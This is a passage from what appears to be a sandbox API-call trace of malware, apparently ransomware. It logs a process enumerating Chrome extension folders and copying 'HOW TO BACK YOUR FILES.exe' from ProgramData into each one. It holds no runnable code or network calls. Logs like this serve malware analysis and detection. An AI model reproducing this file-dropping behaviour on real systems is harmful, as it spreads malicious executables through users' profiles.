nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.300] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs" [0111.300] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs" [0111.300] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.300] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.301] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.301] GetLastError () returned 0x0 [0111.302] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.302] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83419be0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d7d7960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d7d7960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.302] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca" [0111.302] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca" [0111.302] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.302] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.303] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.303] GetLastError () returned 0x0 [0111.303] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.303] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8340ffa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d7d7960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d7d7960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.304] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn" [0111.304] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn" [0111.304] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.304] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.305] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.305] GetLastError () returned 0x0 [0111.305] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.305] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8340b180, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d7fdac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d7fdac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.305] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg" [0111.306] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg" [0111.306] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.306] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.306] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.307] GetLastError () returned 0x0 [0111.307] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.307] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83403c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d7fdac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d7fdac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.307] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar" [0111.307] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar" [0111.307] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.307] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.308] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.308] GetLastError () returned 0x0 [0111.309] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.309] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x833f7900, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d823c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d823c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.309] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am" [0111.309] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am" [0111.309] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.309] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.310] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.310] GetLastError () returned 0x0 [0111.310] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.310] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x833e8ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d823c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d823c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.311] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details" [0111.311] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details" [0111.311] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.311] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.311] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.312] GetLastError () returned 0x0 [0111.312] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.312] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8368d2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d849d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d849d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.312] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup" [0111.313] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup" [0111.313] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.313] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.313] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.314] GetLastError () returned 0x0 [0111.314] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.314] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83663ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d8e2300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d8e2300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.314] 